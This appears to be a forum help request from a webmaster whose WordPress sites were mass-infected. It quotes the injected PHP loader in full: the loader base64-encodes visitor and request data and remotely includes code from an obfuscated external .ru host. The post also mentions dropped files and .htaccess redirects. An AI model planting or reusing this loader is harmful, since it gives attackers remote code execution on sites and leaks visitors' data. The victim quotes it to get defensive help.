vad111Recently I found scripts in php files through all my domains, the code looks like this:
error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);}
Besides this code I found different files scattered through out folders in all my sites. They looks like this: date.php, command.php, link.php, etc...
Almost in each folder was two files like that plus additional .htaccess file that pointing on one of these foreign php files.
It took me very long time to clean it up and I am almost got deindexed in Google and other search engines.
There were too many injected files so it wasn't done by hand but by some automated program on the server side
I am very interested how did it happen and what should be done to prevent such injections in the future.
I always keep my wordpress platforms updated to the latest version.
Thank you,
Vadim
